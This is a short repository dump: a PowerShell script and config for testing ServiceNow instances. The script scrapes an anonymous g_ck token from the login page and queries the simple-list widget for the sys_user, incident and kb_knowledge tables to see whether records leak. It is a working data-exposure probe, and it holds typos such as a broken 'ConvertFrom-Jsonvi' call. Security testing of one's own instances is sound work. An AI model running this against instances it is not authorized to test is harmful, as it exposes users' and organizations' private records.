SerivceNow Widget Exploit Testing

ReadMe.md

Powershell script to to test simple lis

config.json

{
    "instance": "devxxxxx",
    "widget": "widget-simple-list",
    "tables": [
        "sys_user",
        "incident",
        "kb_knowledge"
    ]
}

ServiceNow_WidgetExploit_test.ps1

#WWork in progress

$configFile = "config.json"
$config = Get-Content $configFile -raw  |ConvertFrom-Jsonvi



function getUserToken() {
    param (
        [Parameter(Mandatory=$False)] [string]$instance = $config.instance
    )
   
    $request = Invoke-WebRequest -Method GET -Uri "https://$($instance).service-now.com/login.do"
    $g_ck = $request.content|select-string -pattern "g_ck = '(\w+)'" -AllMatches -CaseSensitive
    return $g_ck.matches[0].Groups[1].value;
}

function testTable() {
    param (
        [Parameter(Mandatory=$False)] [string]$instance = $config.instance,
        [Parameter(Mandatory=$False)] [string]$widget = $config.widget,
        [Parameter(Mandatory=$False)] [string]$userToken = $userToken,
        [string]$tableName
    )

    $uri = "https://$($instance).service-now.com/api/now/sp/widget/$($widget)?t=$($tableName)"
  
    $headers = @{
        "X-UserToken" = $userToken
        "Content-Type" = "application/json"
    }

      invoke-WebRequest -Headers $headers -Uri $uri  -Method "Post"
}

$results = @{};
$userToken = getUserToken;


$config.tables | ForEach-Object  {
    $_
  $results[$_] = testTable -tableName $_ 
  
}

$results